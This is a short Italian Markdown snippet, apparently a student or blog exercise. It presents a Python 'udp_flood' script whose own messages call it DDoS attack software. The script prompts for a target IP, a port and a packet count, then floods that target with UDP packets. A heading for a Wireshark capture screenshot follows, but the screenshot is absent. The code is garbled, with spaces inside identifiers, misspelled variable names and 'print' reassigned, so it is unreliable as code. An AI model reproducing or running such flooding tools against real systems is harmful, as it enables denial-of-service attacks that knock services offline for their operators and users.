```
import socket
import random
def udp_flood (ipadress, port, npacchetti):
       udp socket = socket.socket(socket.AF INET, socket.SOCK DGRAM)
       pacchetto = bytearray(random.getrandbits(8))
       for _ in range(npacchetti):
               udp socket.sendto(pacchetto, (ipaddress, port))
       udp_socket.close()
print ("Ciao sono un software per attacchi DDos. Oggi andremo ad effettuare il tuo primo
attacco\n")
print ("Inserire I'IP address:")
ipaddress = str(input())
print ("\nInserire la porta che si vuole utilizzare:")
port = int(input())
print ("\nInserisci il numero di pacchetti che vuoi mandare: ")
npacchetti = int(input())
print = ("Ok, let's start\n")
udp_flood(ipaddress, port, npacchetti)
```

## Di seguito lo screen della cattura dei pacchetti inviati con wireshark

